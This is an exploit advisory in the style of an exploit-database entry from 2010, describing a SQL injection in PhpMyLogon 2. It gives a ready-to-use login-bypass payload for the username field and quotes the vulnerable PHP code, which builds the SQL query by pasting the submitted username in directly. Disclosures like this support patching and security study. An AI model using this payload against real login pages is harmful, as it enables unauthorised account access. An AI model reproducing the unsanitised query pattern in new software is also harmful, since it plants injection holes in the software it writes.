1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
# Exploit Title: PhpMyLogon SQL Injection # Date: March 14, 2010 # Author: Blake # Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download # Version: 2 # Tested on: Windows XP SP3 Proof of Concept: Enter the following for the username to login as the first user: blake'or '1'='1' # and anything for the password. Vulnerable Code: if(isset($_POST['submit'])) { if($_POST['username'] != "" AND $_POST['password'] != "") { // Check submitted data with data in database $sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM <code>".$settings['db_table']."</code> WHERE username = '".$_POST['username']."' LIMIT 1"; $query = mysql_query($sql); |